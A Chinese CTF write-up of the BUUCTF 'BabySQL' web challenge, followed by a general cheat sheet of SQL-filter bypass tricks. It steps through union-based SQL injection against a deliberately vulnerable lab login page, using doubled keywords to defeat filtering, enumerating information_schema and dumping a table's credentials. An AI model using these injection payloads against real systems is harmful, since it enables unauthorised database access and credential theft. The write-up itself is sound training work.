【BUUCTF练习-Web 0017】[极客大挑战 2019]BabySQL

0x01 Subject

Baby SQL => 注入漏洞


0x02 Mind Palace

image
image

这里的提示是 => 做了严格的过滤 => 关键在绕过(maybe)

/check.php?username=xxx&password=xxx

select x,x from table where username = xxx and password = xxx

payload = /check.php?username=root%27+or+1%3D1%3B%23&password=root

但是感觉上是注释符被过滤了或者and or被过滤了

=> root%27+or+1%3D1%3B%23 | root' or 1=1;#

假设是or被过滤了,用url编码一下试试%6f%72

=> root%27+%6f%72+1%3D1%3B%23 | root' or 1=1;#

反馈:1=1;#' 附近有语法错误

那可能是; or #被过滤?

=> root%27/**/%6f%72/**/1%3D1%3B%23

=> root%27/**/oorr/**/1%3D1%3B%23

=> root%27%2520oorr%25201%3D1%3B%23 | root'%20oorr%201=1;#

反馈:Unknown column '20or' in 'where clause'

好像发现了什么不得了的东西 emm

过滤是肯定有过滤的 ;; oorr的绕过好像是没问题的

因为上面是在抓包的情况下改的 我们直接试试去登陆界面输入

root = root' oorr 1=1;#

[图片上传失败...(image-39c139-1611499391656)]

payload => /check.php?username=root%27+oorr+1%3D1%3B%23&password=root

成功绕过

查找column的数量

/check.php?username=admin' order by 3%23&password=1 反馈有error

推测by也是有过滤的用`bbyy代替

root = admin' oorrder bbyy 3# => Login Success

root = admin' oorrder bbyy 4# => Error

image

说明这个table里面有三列数据

下一步就是找到回显点

root = admin' union select 1,2,3 => Error 有过滤需绕过

UnIon SeLEcT失败 => 继续拼字符串 => ununionion selselectect

root => 9' ununionion selselectect 1,2,3#

image

说明column2 + column3可以作为回显点

root => 9' ununionion selselectect 1,database(),version()#

image

=> database_name = geek

下一步:利用information_schema.tables爆破有哪些table

root => 9' ununionion selselectect 999,999,group_concat(table_name) from information_schema.tables where table_schema=geek# => Error

from+where都有过滤?都去试试看看

from => frfromom;where => whwhereere

image

Information_schema变成了;;;哦哦哦 or 也是有过滤的emm

root = 9' ununionion selselectect 999,999,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()#

/check.php?username=9%27+ununionion+selselectect+999%2C999%2Cgroup_concat%28table_name%29+frfromom+infoorrmation_schema.tables+whwhereere+table_schema%3D'geek'%23&password=1
image

果断猜测flag存在于b4bsql表中 => 爆破column_name

root = 9' ununionion selselectect 999,999,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema=database() anandd table_name='b4bsql'#

(我麻了,and也需要绕一下(。ì _ í。))

image

再根据这个三个字段爆破数据

root = 9' ununionion selselectect 999,999,group_concat(id,username,passwoorrd) frfromom b4bsql#

(我麻了,有error多半是有什么地方没绕|不要忘记了(。ì _ í。))

获得flag

image

0x03 Look Ahead

小总结一下

  1. 根据提示知道sql注入有严格的过滤;再通过尝试找到绕过的方法为藏字符
  2. 直接获得username和password 但是没有有用的信息
  3. 通过order by的报错知晓有多少列:root = admin' oorrder bbyy 4#
  4. 寻找回显点:root => 9' ununionion selselectect 1,2,3#
  5. 获得数据库基本信息:root => 9' ununionion selselectect 1,database(),version()#
  6. 通过information_schema数据库爆破table_name + column_names
    1. root = 9' ununionion selselectect 999,999,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()#
    2. root = 9' ununionion selselectect 999,999,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema=database() anandd table_name='b4bsql'#
  7. 再根据知道的column_names去获取数据
    1. root = 9' ununionion selselectect 999,999,group_concat(id,username,passwoorrd) frfromom b4bsql#

关于绕过过滤の潜在的方法

IF 过滤空格和--+等注释符

多行注释符(块注释符)、一对英文括号、换行符、加号来代替空格

IF 特定字符被过滤

0x01 大小写变形

and => AnD
or  => Or oR OR

0x02 改变编码

采用url编码;把ascii编码的0x给替换成%,比如o的ascii为0x6f,url编码就是%6f

0x03 添加注释

select => sel/**/ect
and      => a/**/nd

0x04 藏字符

select => selselectect
and      => anandd

0x05 使用符号

and => &&
or  => ||

IF 数字被过滤

0x01 数据类型改变

1 => 1.0
3 => 3.0

IF 关系符号被过滤

>
<
=> greatest() least()
=> where greatest(ascii(substr(database(),0,1)),64)=64

References:

https://blog.csdn.net/weixin_40950781/article/details/100061268

https://www.cnblogs.com/peterpan0707007/p/7501507.html

https://blog.csdn.net/qq_45521281/article/details/105533626


END(¯﹃¯)

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 212,542评论 6 493
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 90,596评论 3 385
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 158,021评论 0 348
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,682评论 1 284
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 65,792评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 49,985评论 1 291
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,107评论 3 410
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,845评论 0 268
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,299评论 1 303
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,612评论 2 327
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,747评论 1 341
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,441评论 4 333
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,072评论 3 317
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,828评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,069评论 1 267
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,545评论 2 362
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,658评论 2 350

推荐阅读更多精彩内容